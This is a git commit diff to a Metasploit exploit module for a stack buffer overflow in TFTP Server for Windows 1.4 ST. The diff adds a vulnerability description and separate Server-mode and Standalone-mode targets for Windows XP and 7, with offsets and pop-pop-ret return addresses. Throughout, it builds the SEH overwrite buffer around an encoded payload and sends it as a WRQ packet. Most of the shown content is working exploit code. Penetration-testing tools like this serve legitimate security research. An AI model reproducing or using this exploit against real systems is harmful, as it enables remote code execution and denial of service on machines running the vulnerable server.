Implemented Changes suggested by wchen-r7 (sinn3r)

unstable
unknown 2012-04-20 00:02:41 +01:00 committed by sinn3r
parent feb625cab0
commit 47ecd36805
1 changed files with 18 additions and 7 deletions

View File

@ -21,7 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
'Description' => %q{ TFTP Server for Windows V1.4 ST WRQ request packet exploit Coded by Mati Aharoni
muts..at..offensive-security.com SEH Exploit
muts..at..offensive-security.com
The vulnerability occurs due to the way TFTP handles the filename parameter extracted from a WRQ request.
The server will append the user-supplied filename to TFTP server binary's path without any bounds checking,
and then attempt to open this with a fopen(). Since this isn't a valid file path, fopen() returns null,
which allows the corrupted data to be used in a strcmp() function, causing an access violation.
Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine
launched the TFTP as a 'Service' or 'Standalone', and then manually select your target accordingly.
A successful attempt will lead to remote code execution; a failed attempt may result a denial-of-service.
ported to metasploit by Datacut},
'Author' =>
@ -73,16 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote
# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. possible may work for other service packs and or vista
[ 'Windows XP SP2/SP3 EN', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x64', { 'Ret' => 0x416801 , 'Offset' => 1217} ] # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x86', { 'Ret' => 0x416801 , 'Offset' => 1223} ] # pop pop ret tftpserversp.exe
[ 'Windows XP SP2/SP3 EN Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x64 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x86 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x86 Standalone Mose', { 'Ret' => 0x416801 , 'Offset' => 1507} ] # pop pop ret tftpserversp.exe
],
'Privileged' => false,
'DisclosureDate'=> 'Mar 26 2008',
'DefaultTarget' => 2))
'DefaultTarget' => 5))
register_options(
@ -107,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
mode = "netascii"
sploit = "\x00\x02" + evil + "\0" + mode +"\0"
sploit = "\x00\x02" + evil + "\0" + mode +"\0" #Send the WRQ packet (header "\x00\x02")
udp_sock.put(sploit)